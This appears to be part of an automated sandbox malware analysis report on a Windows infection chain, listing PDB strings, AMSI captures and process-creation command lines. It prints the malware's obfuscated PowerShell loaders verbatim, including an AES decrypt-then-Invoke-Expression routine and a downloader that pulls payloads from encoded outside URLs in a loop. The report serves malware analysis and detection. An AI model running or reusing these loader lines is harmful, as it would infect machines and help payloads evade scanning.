                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb, source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.StdIn();IHost.StdErr();IHost.StdOut();IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.FullName();IWshShell3.Run("powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([Str", "0", "false")
                  Source: Yara match File source: 0000000E.00000002.3375923464.000000000AC25000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Discommend175 $Fugitating120 $Kortspillene), (Wraithy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Institutionaliser = [AppDomain]::CurrentDomain.GetAss
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Leveringstidspunktet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($blankoveksel, $false).DefineType($Ly
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_0041CB50 | LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, | 4_2_0041CB50
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F0816B | push ebx; ret | 2_2_00007FF848F0816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F080D3 | push ebx; ret | 2_2_00007FF848F0816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F000BD | pushad ; iretd | 2_2_00007FF848F000C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00457106 | push ecx; ret | 4_2_00457119
